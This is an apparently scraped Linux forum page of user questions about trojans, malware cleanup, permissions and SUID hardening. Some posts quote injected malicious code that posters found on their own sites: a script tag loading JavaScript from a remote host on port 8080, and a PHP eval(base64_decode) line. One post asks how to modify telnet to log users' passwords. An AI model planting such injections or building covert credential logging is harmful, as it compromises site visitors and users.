Ubuntu Security :: Using Ubuntu To Remove Trojan From Windows 7
May 31, 2011
I stupidly clicked on a spam link on my roommate's computer (I must have forgotten that I wasn't using Ubuntu and had to be much more careful) and the computer is now infected by a nasty Trojan. (I unfortunately cannot remember the name right now, but it is a Trojan.) Now, her computer will barely start up under the normal Windows 7 without a blue screen of death appearing, with the IRQL_NOT_LESS_OR_EQUAL error message.I stumbled upon this: http://maketecheasier.com/remove-win...ux/2010/02/02/ and I thought I would give it a shot.I don't have a flash-drive, and I'm rather tight on cash at the moment, so instead of creating a USB stick with the OS they recommended, I used my live CD of Ubuntu 10.4. I installed Clam, and ran the update as it says, and it seemed to work alright. When I started the scan, however, (excluding .doc files), the first message that came up was that the software was out of date, but the scan proceeded, and so I figured all was alright. The scan took about an hour 45, and when it was done, it reported that 0 files were infected, and that there were 4 errors. I crossed my fingers and hoped that these errors were the problem and Clam fixed it, but alas, this was not the case. The computer is still just as screwed up.
Does anyone have any suggestions? Maybe the updates couldn't be saved because I was using a live CD instead of a USB? Hopefully this isn't the case, because I really don't want to have to go and buy a flashdrive, but I will if I must. Can a portion of an external harddrive be used as a boot drive?
View 9 Replies
ADVERTISEMENT
Feb 19, 2009
after compressing one of my sites and downloading it to my Windows PC my Antivirus picked up a trojan horse called "PHP/Rst.AK Trojan" Im still very new to all this and was wondering how i go about removing malware etc from my fedora 8 server. IS there a free virus scaning software i should be using ?
View 3 Replies
View Related
Jun 28, 2010
One of my friends website has the following code in almost 1500 files
Code:
<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--db99f6effefc0ff79b57c785dc1a107c-->
How can I remove it? I tried clamscan but it did not find anything. I was thinking if I can use grep/sed to remove the above from the files.
View 7 Replies
View Related
May 16, 2010
I used my printer without any problems using ubuntu os. As the day went surfing got slower. I lost ability to print. Went into windows os, which I haven't used for a few day, and scanned with superantispyware. A Trojan virus was found. Went back to ubuntu os and found that all printer programs had been removed.
View 9 Replies
View Related
Sep 27, 2010
After some time i always see a trojan virus in my ubuntu machines shared folder. It is an exe detected by ClamAv as Trojan.Autokit-77 I thought i was getting it from some windows machine on the network but that isn't the case. I deleted the virus and removed my computer from the network and still the virus comes back. My computer however, is still connected to the internet through an independent mobile broadband usb stick.
So where is the virus coming from and why is it going to my shared folder. I thought ubuntu would not allow the virus to do something like this without me giving it permission. I am running 10.4.
View 9 Replies
View Related
Jun 20, 2010
I want to log the user name and password passed through the default telnet client on Fedora (7 to 11) system.I have thought of something like this:(Download Telent client src)->(modify src)->(compile and install)but i am not sure...
View 11 Replies
View Related
May 2, 2010
if i run a program that is infected with a trojan/virus in Wine will it effect Ubuntu?
View 9 Replies
View Related
Feb 22, 2011
Like Jackp27, I am reacting to a transient warning from rkhunter, indicating a possible LKM trojan, which may or may not be a false positive. Running chkrootkit and rkhunter repeatedly, including older versions running under live CDs like INSERT, indicated nothing wrong, but two runs of rkhunter running under the possibly compromised system itself did seem to suggest rkhunter thought it might have found elements of trojan code in RAM.
Like Jackp27, I can't give details right now because I do not currently have access to my logs, but I did find one webpage (can't give link because I do not currently have access to my detailed notes) suggesting that rkhunter may have thought it found a signature of the adore trojan in RAM by looking at /proc/kallsymms which is not a file I ordinary look at. I did look at it very closely yesterday, repeatedly, and it seems to be mostly empty, but occasionaly seems to contain what might be a sequence of calls to various kernel modules--- right now I only recall that some had the form ??_guest_? and that x_tables might be involved.
Can anyone give me a rough indication of what /proc/kallsymms is supposed to do, whether it should normally be empty, and when it is not, what kind of lines are supposed to show up in that "file" when I cat it? I also saw something about ?_logdrop? which may have had something to do with with rotating logs (I rebooted several times) rather than a trojan keylogger. But maybe some trojans rotate logs to try to hide their presence?
I know I am not giving enough information--- I hope to come back later with more details after I have managed to access my logs and notes, so feel free to say what kind of details would be most helpful in helping me decide whether or not this was a false positive.
View 6 Replies
View Related
Jun 3, 2011
I just pulled the MS Removal Tool executable off a Windows 7 machine. Is there a way I can view the code on my Ubuntu machine? I am curious how they block the "real" av software from running. I did get rid of it, pretty simple.
View 5 Replies
View Related
Oct 10, 2009
If I leave the computer running for a few minutes without doing anything on it, this screen appears demanding that I enter my password, otherwise I can't get back to Fedora. I understand the necessity for this security feature in a work environment, but I'm just a home user and this security screen is just a nagging problem I don't know how to get rid of.
View 1 Replies
View Related
Jun 21, 2011
PartedMagic live linux can load to memory and run clamav on a windows drive to check for and remove viruses. However, I need to also find and remove trojans and worms on a windows drive which clamav can not find. Is there any worm and trojan removers for linux or do you need to install WINE and run the windows trojan and worm removers.
View 3 Replies
View Related
Jan 21, 2010
I am on the admin account of my computer and am trying to remove all privileges from CWD i have tried
chmod go-rwx ~
sudo chmod go-rwx ~
but when i pull up
ls -l ~
It is still showing permission in the g and o column.
View 9 Replies
View Related
Jan 7, 2010
How can I remove authentication completely from my pc?
How can I edit the files present in the patrician filesystem?
View 8 Replies
View Related
Feb 28, 2010
Can a virus survive a reformat, running bootrec /fixmbr (both from the install CD), and then installing Ubuntu? Reformat meaning from the windows disk recovery console, using the format command for all partitions. Likewise, would a virus be capable of surviving just the first two steps alone without installing Ubuntu, just re-installing windows?
If one were to have an MBR virus on Windows or Linux, how abouts would you find or remove it without doing an entire disk wipe? And before someone goes "Linux is immune" take into consideration vulnerabilities on the user end.
View 9 Replies
View Related
Oct 12, 2010
How can I remove this string from all files. I am not sure how it did get there
PHP Code:
<?php /**/eval(base64_decode('')); ?>
I tried this but It did not work
PHP Code:
find . -iname *.php* -exec sed -i 's/<?php /**/eval(base64_decode('')); ?> //g' {} ;
View 4 Replies
View Related
Oct 31, 2010
I have a dual-boot with windows and linux. Sometimes if I reboot from windows into linux, I notice that when X is starting up before the login screen comes up it will flash a screenshot from Windows. Has anyone ever noticed this?
View 4 Replies
View Related
Feb 8, 2010
I have a Ubuntu file server with a mix of 30+ users ( mix of windows and linux ).All are members of the same group. All need read write create access. I want to prevent deletion of certain key folders. How can I achieve this ? sudo chmod -R nnnn ??
View 8 Replies
View Related
Apr 7, 2010
I found LKL on my computer. I need to remove it. It isn't showing up in synaptic and i can't figure out how to remove it. SUDO apt-get remove lkl tells me this. E: Couldn't find package lkl. i can't find it with the search and with google.
View 4 Replies
View Related
May 3, 2010
When I installed, I selected the option to encrypt my home folder. I believe this is causing constant crashes now, since error message is user id/password related. Is there a way to remove the encryption?
View 5 Replies
View Related
Jul 31, 2010
Is there any way to remove the whole disk encryption without reinstalling? I'm running Ubuntu 10.04.
View 2 Replies
View Related
Jul 10, 2011
I've installed Ubuntu via UNetbootin from USB on my child's computer. It comes by default with the sudo command which I find really annoying to work with. I'd rather have my su command.
Now, while googling for a removal instruction, I've read that the sudo command is tied to system functions on some Ubuntu live systems and can't be removed easily. Does anyone know if this applies to the 10.04 live version used by UNetbootin and how to work around this problem?
If not, is it simply enough to remove 'sudo' via the software center? I find many tutorials on how to switch from su to sudo but not much about the other way around.
View 7 Replies
View Related
Mar 19, 2010
I've got a samba share on a linux server, connecting to it with a windows 2k3 server via tools > map network drive. The goal is to be able to use windows to change the security of the samba share. The good news is it works! The bad news is it's not QUITE perfect:
The share is called /company. I started with the following to give everyone access to everything, set the owner of the share to administrator (my domain admin on the Windows domain), and set the group owner to domain users (group that everyone on the domain is part of):
Code:
chmod -R 777 /company
chown -R administrator /company
chgrp -R domain users /company
I then mapped the drive as a regular user, and of course, can access/modify/delete/rename/create anything I want. Then I picked a folder to lock down. Let's call it /company/myFolder. I did this on the Windows server by mapping the drive as administrator (the owner), right click > properties > security tab > advanced > highlight "domain users" and "everyone" and click edit > clear all (i.e. remove all access). Go back to Linux and
[Code]..
The only issue that remains is that I am able to rename/delete "myFolder" as a regular user. I thought this was coming from the "acl map full control = true" parameter in smb.conf, but I changed it to false and verified the change and it still happens. If I remove group and world write access to /company, I am no longer allowed to rename/delete myFolder, but then I can't create a new folder. If I add group write access back in I can create files but can also rename/delete folders within /company that have --- specified for group access. Any ideas what I need to tweak to make this right?
View 1 Replies
View Related
Jan 1, 2010
I installed Ubuntu 9.10 netbook remix on my Acer Aspire One D250 computer. The broadcom wireless NIC succeeds in connecting to the network but only if I remove the WPA-PSK security in the Netgear router settings. What do I need to change in order to be able to secure my network?
View 2 Replies
View Related
Apr 15, 2011
I've been reading a lot of articles on Xorg XWindow System having the ability to allow 6600/tcp for remote screen connections and I've been trying to find a way to remove the functionality without having to just dump XWindow and settle for CLI on my server. I heard it was disabled by default, but I just want to get rid of that ability completely by cutting it out of it's code and yes, I'm feeling very, very paranoid.
View 2 Replies
View Related
May 20, 2011
Do to the last thread I posted got way off topic do to my bad doing , I will post it again to get the thread back on topic.I try it one last time hopefully these myths will be cleared up and this thread will stay on topic an not derail like last one.The myths going around on the internet.
1.Less than 1% use Linux and 10% use Mac Os X it is not that they are so much better but market share .The Malware makers are going windows where the market shares are.
2.Windows have more security but most people don't use it.
3.Mac OS X security is not that good , windows is better.
4.windows it has more gradual permission level than a ON and OFF like Linux or Mac OS X
5.Malware is growing with Linux and Mac OS X now.
View 3 Replies
View Related
Sep 10, 2009
As Linux gains in popularity, (as I believe it will), do you think that Linux will ever become the target of as many virus and worm threats as Windows has faced? If so, do you think that the threats will have much success?
View 2 Replies
View Related
Jan 15, 2010
I have a dual boot system with Win XP and Ubuntu 9.10.My problem is, that I am not able to start Ubuntu anymore, it fails to boot.
Actually I don't intend to repair it, instead I would like to remove it and free up the space used by the ubuntu partition on my hard drive.i want to save some of my files kept in the linux filesystem, but I can live without them if that is not possible.
View 5 Replies
View Related
May 16, 2011
I installed ubuntu 11.04 using wubi now I want to get rid of windows how do I do this?
View 9 Replies
View Related
Jan 20, 2010
I've searched the forum, but nothing answers my question. We know the security risk posed by suid, sgid.I'm looking to remove the suid bits from all programs that do not absolutely need it.
This command:
find / -type f ( -perm -04000 -o -perm -02000 ) -exec ls -lg {} ;
gave the list below.
For which of these programs can I safely remove the suid bit? I don't want to break my system by modifying a program that the system needs.
-r-sr-xr-x 1 bin 502172 Jan 10 12:36 /usr/local/bin/dccproc
-r-sr-xr-x 1 bin 186683 Jan 10 12:36 /usr/local/bin/cdcc
-r-s--x--x 1 root 23980 Nov 17 00:27 /usr/lib/virtualbox/VBoxNetDHCP
-r-s--x--x 1 root 9896 Nov 17 00:27 /usr/lib/virtualbox/VBoxNetAdpCtl
-r-s--x--x 1 root 23976 Nov 17 00:27 /usr/lib/virtualbox/VBoxSDL
[Code]...
View 3 Replies
View Related
Mar 16, 2010
I say to remove access to MOST of these SUID binaries? do they all need this power? what i want to do is minimize access just incase one of them gets an exploit(as ive already done for apache SuEXEC)
[Code]...
View 1 Replies
View Related
